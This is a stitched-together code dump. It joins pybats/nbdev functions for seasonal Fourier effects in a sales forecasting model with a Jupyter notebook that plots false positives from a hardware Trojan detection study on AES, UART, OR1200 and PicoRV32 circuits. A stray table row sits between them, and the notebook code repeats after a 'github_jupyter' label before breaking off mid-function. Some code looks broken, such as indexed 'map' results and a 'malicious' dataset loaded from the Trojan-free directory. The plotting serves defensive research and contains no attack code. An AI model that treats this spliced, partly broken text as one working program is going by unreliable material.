def createFourierToSeasonalL(period, harmComponents, Fseas, Gseas):
p = len(harmComponents)
L = np.zeros([period, 2*p])
L[0,:] = Fseas.reshape(-1)
for i in range(1, period):
L[i,:] = L[i-1,:] @ Gseas
return L
#export
def fourierToSeasonal(mod, comp=0):
phi = mod.L[comp] @ mod.m[mod.iseas[comp]]
var = mod.L[comp] @ mod.C[np.ix_(mod.iseas[comp], mod.iseas[comp])] @ mod.L[comp].T
return phi, var
import numpy as np
import pandas as pd
from pybats_nbdev.analysis import analysis
from pybats_nbdev.shared import load_sales_example2
data = load_sales_example2()
prior_length = 21 # Number of days of data used to set prior
mod = analysis(data.Sales.values, data[['Price', 'Promotion']].values, k=1,
family='poisson',
seasPeriods=[7], seasHarmComponents=[[1,2,3]],
prior_length=prior_length, dates=data.index,
ret = ['model'])
seas_mean, seas_cov = fourierToSeasonal(mod)
days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
lastday = data.index[-1]
days = [*days[lastday.isoweekday()-1:], *days[:lastday.isoweekday()-1]]
seas_eff = pd.DataFrame({'Day':days,
'Effect Mean':np.exp(seas_mean.reshape(-1))})
seas_eff
#exporti
def fourierToSeasonalFxnl(L, m, C, iseas):
phi = L @ m[iseas]
var = L @ C[np.ix_(iseas, iseas)] @ L.T
return phi, var
#exporti
def get_seasonal_effect_fxnl(L, m, C, iseas):
phi, var = fourierToSeasonalFxnl(L, m, C, iseas)
return phi[0], var[0, 0]
#exporti
def sample_seasonal_effect_fxnl(L, m, C, iseas, delVar, n, nsamps):
phi_samps = np.zeros([nsamps])
phi, var = fourierToSeasonalFxnl(L, m, C, iseas)
phi_samps[:] = phi[0] + np.sqrt(var[0,0])*np.random.standard_t(delVar*n, size = [nsamps])
return phi_samps
#exporti
def forecast_weekly_seasonal_factor(mod, k, sample = False, nsamps = 1):
a, R = forecast_aR(mod, k)
idx = np.where(np.array(mod.seasPeriods) == 7)[0][0]
if sample:
return sample_seasonal_effect_fxnl(mod.L[idx], a, R, mod.iseas[idx], mod.delVar, mod.n, nsamps)
else:
return get_seasonal_effect_fxnl(mod.L[idx], a, R, mod.iseas[idx])
#exporti
def forecast_path_weekly_seasonal_factor(mod, k, today, period):
phi_mu = [np.zeros([period]) for h in range(k)]
phi_sigma = [np.zeros([period, period]) for h in range(k)]
phi_psi = [np.zeros([period, period, h]) for h in range(1, k)]
idx = np.where(np.array(mod.seasPeriods) == 7)[0][0]
L = mod.L[idx]
iseas = mod.iseas[idx]
for h in range(k):
# Get the marginal a, R
a, R = forecast_aR(mod, h + 1)
m, v = get_seasonal_effect_fxnl(L, a, R, iseas)
day = (today + h) % period
phi_mu[h][day] = m
phi_sigma[h][day, day] = v
# phi_mu[h], phi_sigma[h] = get_latent_factor_fxnl_old((today + h) % period, mod.L, a, R, mod.iseas, mod.seasPeriods[0])
# Find covariances with previous latent factor values
for j in range(h):
# Covariance matrix between the state vector at times j, i, i > j
day_j = (today + j) % period
cov_jh = forecast_R_cov(mod, j, h)[np.ix_(iseas, iseas)]
phi_psi[h-1][day, day_j, j] = phi_psi[h-1][day_j, day, j] = (L @ cov_jh @ L.T)[day, day_j]
# cov_ij = (np.linalg.matrix_power(mod.G, h-j) @ Rlist[j])[np.ix_(mod.iseas, mod.iseas)]
return phi_mu, phi_sigma, phi_psi
#hide
from nbdev.export import notebook2script
notebook2script()
| 0.484624 | 0.914558 |
```
import sys
sys.path.insert(0, '../scripts')
from load_data_df import *
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes, inset_axes
from mpl_toolkits.axes_grid1.inset_locator import mark_inset
```
# Data Paths
```
# AES
tjfree_aes_data_dir = '/Users/ti27457/Repos/ttb/circuits/aes/tjfree_75eds'
mal_aes_data_dir = '/Users/ti27457/Repos/ttb/circuits/aes/mal_75eds'
# UART
tjfree_uart_data_dir = '/Users/ti27457/Repos/ttb/circuits/uart/tjfree_16bytes'
mal_uart_data_dir = '/Users/ti27457/Repos/ttb/circuits/uart/mal_16bytes'
# OR1200
tjfree_or1200_data_dir = '/Users/ti27457/Repos/ttb/circuits/or1200/tjfree_combined'
mal_or1200_data_dir = '/Users/ti27457/Repos/ttb/circuits/or1200/mal_combined'
# PICORV32
tjfree_picorv32_data_dir = '/Users/ti27457/Repos/ttb/circuits/picorv32'
mal_picorv32_data_dir = '/Users/ti27457/Repos/ttb/circuits/picorv32'
```
# Plot Settings
```
# Plot Settings
FIG_WIDTH = 9
FIG_HEIGHT = 4
LINE_WIDTH = 2
HIST_SAVE_AS_PDF = True
AES_SAVE_AS_PDF = True
UART_SAVE_AS_PDF = True
OR1200_SAVE_AS_PDF = True
PICORV32_SAVE_AS_PDF = True
# Plot PDF Filenames
# HIST_PDF_FILENAME = 'cntr_sizes_histogram.pdf'
AES_PDF_FILENAME = 'aes-75tests-100res-100ps-2x.pdf'
UART_PDF_FILENAME = 'uart-1tests-1000res-100ps-2x.pdf'
OR1200_PDF_FILENAME = 'or1200-1tests-10000res-100ps-combined-2x.pdf'
PICORV32_PDF_FILENAME = 'picorv32-1tests-10000000res-1ps-combined-1x.pdf'
```
# Plot Function
```
def plot_counter_fps(tjfree_dir, mal_dir, epochs, y_lims, pdf_fname, save_as_pdf=False):
tjfree_df = load_data_df_wf(tjfree_dir)
mal_df = load_data_df_wf(mal_dir)
# Plot Data
sns.set()
plt.subplots(figsize=(FIG_WIDTH, FIG_HEIGHT))
gs = gridspec.GridSpec(2, len(epochs) - 1)
gs.update(wspace=0.1, hspace=0.2) # set the spacing between axes.
main_ax = plt.subplot(gs[0, :])
# Plot Data in Pane 1
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=mal_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=mal_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
# Format Plot in Pane 1
main_ax.set_xlim(0, epochs[-1])
main_ax.set_xlabel('')
main_ax.set_ylabel('# Counters')
# main_ax.get_xaxis().set_ticks([])
main_ax.get_xaxis().set_ticklabels([])
for tick in main_ax.get_yticklabels():
tick.set_rotation(90)
# Plot remaining panes
for pane_num in range(len(epochs) - 1):
# Set Axis
ax = plt.subplot(gs[1, pane_num])
# Plot Data
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# Format Plot
ax.set_xlim(epochs[pane_num], epochs[pane_num + 1])
ax.set_ylim(-y_lims[pane_num]/25.0, y_lims[pane_num])
if pane_num == 0:
ax.set_ylabel('# Counters')
else:
ax.set_ylabel('')
ax.set_xlabel('Time (ns)')
# ax.grid()
for tick in ax.get_yticklabels():
tick.set_rotation(90)
# # Last Pane
# ax3.set_ylabel('# Counters')
# ax3.yaxis.tick_right()
# ax3.yaxis.set_label_position("right")
# ax3.set_xlabel('Time (ns)')
# Set Legend
main_ax.legend(['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants'])
# # Add Line Separators to Pane 1
# for x_coord in epochs:
# main_ax.axvline(x=x_coord, color='k', linestyle='-')
# Save as PDF
if save_as_pdf:
plt.savefig(pdf_fname, format='pdf', bbox_inches='tight')
def plot_counter_fps_detail(tjfree_dir, mal_dir, epochs, y_lim, x_lim, pdf_fname, save_as_pdf=False):
tjfree_df = load_data_df_wf(tjfree_dir)
mal_df = load_data_df_wf(mal_dir)
# Plot Data
sns.set()
fig, ax = plt.subplots(1, 1, figsize=(FIG_WIDTH, FIG_HEIGHT))
# Plot Data
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# Format Plot in Pane 1
ax.set_xlim(x_lim)
ax.set_ylim(y_lim)
ax.set_xlabel('Time (ns)')
ax.set_ylabel('# Counters')
for tick in ax.get_yticklabels():
tick.set_rotation(90)
# Set Legend
ax.legend(['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants'])
# # Add Line Separators to Pane 1
# for x_coord in epochs[1:]:
# ax.axvline(x=x_coord, color='k', linestyle='-')
# Save as PDF
if save_as_pdf:
plt.savefig(pdf_fname, format='pdf', bbox_inches='tight')
def plot_ttt_timeseries(clk_period, epochs, ylim, tjfree_df, mal_df):
# Create Figure
sns.set()
fig, ax = plt.subplots(1, 1, figsize=(9, 3))
# Plot Data
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
# Format Main Plot
ax.set_ylim(-10, ylim)
ax.set_xlabel('Clock Cycles')
ax.set_ylabel('# SSCs')
for tick in ax.get_yticklabels():
tick.set_rotation(90)
# Add background shading to indicate different testing phases
shade = True
cycle_epochs = map(lambda x: float(x) / float(clk_period), epochs)
for i in range(1, len(cycle_epochs[0:-1])):
x_coord = cycle_epochs[i]
next_x_coord = cycle_epochs[i+1]
# plt.axvline(x=(x_coord-50000), color='0.1', linestyle='--', alpha=.5)
if shade:
ax.fill_between([x_coord, next_x_coord], -10, ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
return ax
```
# Plot AES False Positives
```
# Define Design Characteristics
aes_clk_period = 10
aes_epochs = [0, 9900, 19800]
aes_ylim = 500
# Load Data
aes_tjfree_df = load_data_df_wf(tjfree_aes_data_dir, aes_clk_period, 'aes')
aes_mal_df = load_data_df_wf(mal_aes_data_dir, aes_clk_period, 'aes')
# Create Main Plot
ax = plot_ttt_timeseries(aes_clk_period, \
aes_epochs, \
aes_ylim, \
aes_tjfree_df, \
aes_mal_df)
# Create 2.5x Zoom-in Inset
axins = zoomed_inset_axes(ax, 4, loc=1, bbox_to_anchor=(575, 170))
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Format Inset
x1, x2, y1, y2 = float(11000) / float(aes_clk_period), float(12500) / float(aes_clk_period), -10, 75
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# ax.legend(legend_labels, loc='upper center', bbox_to_anchor=(0.35, 1))
# Save as PDF
if AES_SAVE_AS_PDF:
plt.savefig(AES_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
```
# Plot UART False Positives
```
# Define Design Characteristics
uart_clk_period = 10
uart_epochs = [0, 786150, 1349660, 4482460, 5046260, 8179060]
uart_epochs = map(lambda x: x - 30000, uart_epochs)
uart_ylim = 150
# Load Data
uart_tjfree_df = load_data_df_wf(tjfree_uart_data_dir, uart_clk_period, 'uart')
uart_mal_df = load_data_df_wf(mal_uart_data_dir, uart_clk_period, 'uart')
# Create Main Plot
ax = plot_ttt_timeseries(uart_clk_period, \
uart_epochs, \
uart_ylim, \
uart_tjfree_df, \
uart_mal_df)
# Create 2x zoom-in inset
axins = zoomed_inset_axes(ax, 2, loc=1, bbox_to_anchor=(575, 175))
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Format Inset Plot
x1, x2, y1, y2 = float(6250000) / float(uart_clk_period) , float(7100000) / float(uart_clk_period), -5, 30
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=4, loc2=2, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# Save as PDF
if UART_SAVE_AS_PDF:
plt.savefig(UART_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
```
# Plot OR1200 False Positives
```
# Define Design Characteristics
or1200_clk_period = 20
or1200_epochs = or1200_epochs = [0,2620900,5241700,7035700,8829700,8898100,8966500,9051700,9136900,9882700,10628500,18361300, 26094100,27429100,28764100,28836100,28908100]
or1200_ylim = 175
or1200_cycle_epochs = map(lambda x: float(x) / float(or1200_clk_period), or1200_epochs)
# Load Data
or1200_tjfree_df = load_data_df_wf(tjfree_or1200_data_dir, or1200_clk_period, 'or1200')
or1200_mal_df = load_data_df_wf(mal_or1200_data_dir, or1200_clk_period, 'or1200')
# Create Main Plot
ax = plot_ttt_timeseries(or1200_clk_period, \
or1200_epochs, \
or1200_ylim, \
or1200_tjfree_df, \
or1200_mal_df)
# ============================================================================================================
# Create Zoom-in Inset 1
# axins = zoomed_inset_axes(ax, 6, loc=2, bbox_to_anchor=(280, 230)) # zoom = 2
axins = inset_axes(ax, 3, 1.1, loc=2, bbox_to_anchor=(0.2, 1.3), bbox_transform=ax.figure.transFigure) # stretch, no zoom
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Add Line Separators
shade = True
for i in range(0, len(or1200_cycle_epochs[0:-1])):
x_coord = or1200_cycle_epochs[i]
next_x_coord = or1200_cycle_epochs[i+1]
# plt.axvline(x=(x_coord), color='0.1', linestyle='--', alpha=.5)
if shade:
axins.fill_between([x_coord, next_x_coord], -10, or1200_ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
# Format Inset
x1, x2, y1, y2 = float(8600000) / float(or1200_clk_period), float(9300000) / float(or1200_clk_period), 50, 70
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=4, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# ============================================================================================================
# Create Zoom-in Inset 2
# axins2 = zoomed_inset_axes(ax, 6, loc=2, bbox_to_anchor=(460, 230)) # zoom = 5
axins2 = inset_axes(ax, 1.5, 1.1, loc=2, bbox_to_anchor=(0.73, 1.3), bbox_transform=ax.figure.transFigure) # stretch, no zoom
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
# Add Line Separators
shade = True
for i in range(0, len(or1200_cycle_epochs[0:-1])):
x_coord = or1200_cycle_epochs[i]
next_x_coord = or1200_cycle_epochs[i+1]
# plt.axvline(x=(x_coord), color='0.1', linestyle='--', alpha=.5)
if shade:
axins2.fill_between([x_coord, next_x_coord], -10, or1200_ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
# Format Inset
x1, x2, y1, y2 = float(28750000) / float(or1200_clk_period), float(28930000) / float(or1200_clk_period), -5, 20
axins2.set_xlim(x1, x2)
axins2.set_ylim(y1, y2)
axins2.set_frame_on(True)
axins2.set_xlabel('')
axins2.set_ylabel('')
axins2.xaxis.set_ticklabels([])
axins2.yaxis.set_ticklabels([])
mark_inset(ax, axins2, loc1=3, loc2=4, fc="none", ec="0.5")
plt.setp(axins2.spines.values(), color='0.5')
plt.setp([axins2.get_xticklines(), axins2.get_yticklines()], color='0.5')
# ============================================================================================================
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# ax.legend(legend_labels, loc='upper center', bbox_to_anchor=(0.35, 1))
# Save as PDF
if OR1200_SAVE_AS_PDF:
plt.savefig(OR1200_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
```
# Plot PICORV32 False Positives
```
# Define Design Characteristics
picorv32_clk_period = 10000
# picorv32_epochs = [0, 9112, 9335, 9458, 9634, 10039, 10972, 11909, 12842, 13847, 16082, 18389, 19173, 19993, 20843, 21646, 22506, 24551, 27359, 29582, 30347, 31097, 31757, 32392, 34233, 35180, 36128, 37120, 39157, 41774, 44261, 46280, 48383, 51450, 53974, 56061, 58762, 64181, 70256, 76298, 80204, 80833, 81484, 83321, 83969, 84155, 84214, 84669, 110391]
# picorv32_epochs = [0, 103183, 128433, 132297]
picorv32_epochs = [0, 10308, 22324, 29980, 49939, 75850, 99600, 102410, 132162]
picorv32_epochs_scaled = map(lambda x: x * picorv32_clk_period, picorv32_epochs)
picorv32_ylim = 250
picorv32_cycle_epochs = map(lambda x: float(x) / float(picorv32_clk_period), picorv32_epochs)
# Load Data
picorv32_tjfree_df = load_data_df_wf(tjfree_picorv32_data_dir, picorv32_clk_period, 'picorv32')
picorv32_mal_df = load_data_df_wf(tjfree_picorv32_data_dir, picorv32_clk_period, 'picorv32')
# Create Main Plot
ax = plot_ttt_timeseries(picorv32_clk_period, \
picorv32_epochs_scaled, \
picorv32_ylim, \
picorv32_tjfree_df, \
picorv32_mal_df)
# ============================================================================================================
# Create Zoom-in Inset 1
# axins = zoomed_inset_axes(ax, 6, loc=2, bbox_to_anchor=(280, 230)) # zoom = 2
axins = inset_axes(ax, 1, 1, loc=3, bbox_to_anchor=(0.76, 0.3), bbox_transform=ax.figure.transFigure) # stretch, no zoom
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Add Line Separators
shade = True
for i in range(0, len(picorv32_epochs[0:-1])):
x_coord = picorv32_epochs[i]
next_x_coord = picorv32_epochs[i+1]
# plt.axvline(x=(x_coord), color='0.1', linestyle='--', alpha=.5)
if shade:
axins.fill_between([x_coord, next_x_coord], -10, picorv32_ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
# Format Inset
x1, x2, y1, y2 = 131500, 132500, 0, 20
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=4, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# ============================================================================================================
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# ax.legend(legend_labels, loc='upper center', bbox_to_anchor=(0.35, 1))
# Save as PDF
if PICORV32_SAVE_AS_PDF:
plt.savefig(PICORV32_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
```
|
github_jupyter
|
import sys
sys.path.insert(0, '../scripts')
from load_data_df import *
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes, inset_axes
from mpl_toolkits.axes_grid1.inset_locator import mark_inset
# AES
tjfree_aes_data_dir = '/Users/ti27457/Repos/ttb/circuits/aes/tjfree_75eds'
mal_aes_data_dir = '/Users/ti27457/Repos/ttb/circuits/aes/mal_75eds'
# UART
tjfree_uart_data_dir = '/Users/ti27457/Repos/ttb/circuits/uart/tjfree_16bytes'
mal_uart_data_dir = '/Users/ti27457/Repos/ttb/circuits/uart/mal_16bytes'
# OR1200
tjfree_or1200_data_dir = '/Users/ti27457/Repos/ttb/circuits/or1200/tjfree_combined'
mal_or1200_data_dir = '/Users/ti27457/Repos/ttb/circuits/or1200/mal_combined'
# PICORV32
tjfree_picorv32_data_dir = '/Users/ti27457/Repos/ttb/circuits/picorv32'
mal_picorv32_data_dir = '/Users/ti27457/Repos/ttb/circuits/picorv32'
# Plot Settings
FIG_WIDTH = 9
FIG_HEIGHT = 4
LINE_WIDTH = 2
HIST_SAVE_AS_PDF = True
AES_SAVE_AS_PDF = True
UART_SAVE_AS_PDF = True
OR1200_SAVE_AS_PDF = True
PICORV32_SAVE_AS_PDF = True
# Plot PDF Filenames
# HIST_PDF_FILENAME = 'cntr_sizes_histogram.pdf'
AES_PDF_FILENAME = 'aes-75tests-100res-100ps-2x.pdf'
UART_PDF_FILENAME = 'uart-1tests-1000res-100ps-2x.pdf'
OR1200_PDF_FILENAME = 'or1200-1tests-10000res-100ps-combined-2x.pdf'
PICORV32_PDF_FILENAME = 'picorv32-1tests-10000000res-1ps-combined-1x.pdf'
def plot_counter_fps(tjfree_dir, mal_dir, epochs, y_lims, pdf_fname, save_as_pdf=False):
tjfree_df = load_data_df_wf(tjfree_dir)
mal_df = load_data_df_wf(mal_dir)
# Plot Data
sns.set()
plt.subplots(figsize=(FIG_WIDTH, FIG_HEIGHT))
gs = gridspec.GridSpec(2, len(epochs) - 1)
gs.update(wspace=0.1, hspace=0.2) # set the spacing between axes.
main_ax = plt.subplot(gs[0, :])
# Plot Data in Pane 1
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=mal_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=mal_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
# Format Plot in Pane 1
main_ax.set_xlim(0, epochs[-1])
main_ax.set_xlabel('')
main_ax.set_ylabel('# Counters')
# main_ax.get_xaxis().set_ticks([])
main_ax.get_xaxis().set_ticklabels([])
for tick in main_ax.get_yticklabels():
tick.set_rotation(90)
# Plot remaining panes
for pane_num in range(len(epochs) - 1):
# Set Axis
ax = plt.subplot(gs[1, pane_num])
# Plot Data
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# Format Plot
ax.set_xlim(epochs[pane_num], epochs[pane_num + 1])
ax.set_ylim(-y_lims[pane_num]/25.0, y_lims[pane_num])
if pane_num == 0:
ax.set_ylabel('# Counters')
else:
ax.set_ylabel('')
ax.set_xlabel('Time (ns)')
# ax.grid()
for tick in ax.get_yticklabels():
tick.set_rotation(90)
# # Last Pane
# ax3.set_ylabel('# Counters')
# ax3.yaxis.tick_right()
# ax3.yaxis.set_label_position("right")
# ax3.set_xlabel('Time (ns)')
# Set Legend
main_ax.legend(['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants'])
# # Add Line Separators to Pane 1
# for x_coord in epochs:
# main_ax.axvline(x=x_coord, color='k', linestyle='-')
# Save as PDF
if save_as_pdf:
plt.savefig(pdf_fname, format='pdf', bbox_inches='tight')
def plot_counter_fps_detail(tjfree_dir, mal_dir, epochs, y_lim, x_lim, pdf_fname, save_as_pdf=False):
tjfree_df = load_data_df_wf(tjfree_dir)
mal_df = load_data_df_wf(mal_dir)
# Plot Data
sns.set()
fig, ax = plt.subplots(1, 1, figsize=(FIG_WIDTH, FIG_HEIGHT))
# Plot Data
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# Format Plot in Pane 1
ax.set_xlim(x_lim)
ax.set_ylim(y_lim)
ax.set_xlabel('Time (ns)')
ax.set_ylabel('# Counters')
for tick in ax.get_yticklabels():
tick.set_rotation(90)
# Set Legend
ax.legend(['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants'])
# # Add Line Separators to Pane 1
# for x_coord in epochs[1:]:
# ax.axvline(x=x_coord, color='k', linestyle='-')
# Save as PDF
if save_as_pdf:
plt.savefig(pdf_fname, format='pdf', bbox_inches='tight')
def plot_ttt_timeseries(clk_period, epochs, ylim, tjfree_df, mal_df):
# Create Figure
sns.set()
fig, ax = plt.subplots(1, 1, figsize=(9, 3))
# Plot Data
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
